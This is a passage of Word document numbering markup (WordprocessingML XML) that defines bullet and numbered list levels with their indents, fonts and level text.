        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1C8C6DBA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E7D8E66C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="46FCA16A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FBC661FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4FA85284">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E26606A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1A2703B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F90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23539"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="A4FCD83E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5300857E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A39652B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6A886068">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CFAEE7B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CBD06148">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6CB4D226">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A1D4B2EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B5342A64">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E985BD2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="9CDE6A12">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D01A0F90">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7F8698A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="03B4509E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="34E21522">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="11C07414">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A06A6AE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D4FA306C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="020CC52A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1EBE23AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="AA18F7FA">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BD7A8DB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="06BEF5D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DC30D7DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1B304616">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="51024C0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="86CA62C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2CA0600A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E93EA6C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1F169DB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="51AC8CC4">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B3763FCA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="BE4AA996">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="51BE7A3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7728BACC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C3B231BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B7967B62">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F5F09E50">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="EDF0959A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="237D754B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="51E89138">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8C60CD5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="06DA2A3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7B96B620">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="774E792A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C1AEBA16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="59B4EA12">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3440D32A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9D50A594">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="24E112DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F37EDE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F6CBB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CAC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0900A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="40F46320">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3F9CA006">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9FC4A712">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F4CCF7A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="84902A04">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="3E3E2AFE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C01A565E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BFF838B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7930948E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="292481B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="5BAC49C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="088AD098">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0B063C3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="97EE2A62">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="448C2F68">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="00843F06">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1B666942">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6B5C0F8A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8C74AF62">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="296054F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="7D78CBCA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="·"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AB7A1D42">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F2FEBE94">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D01C44B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="59D82FA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
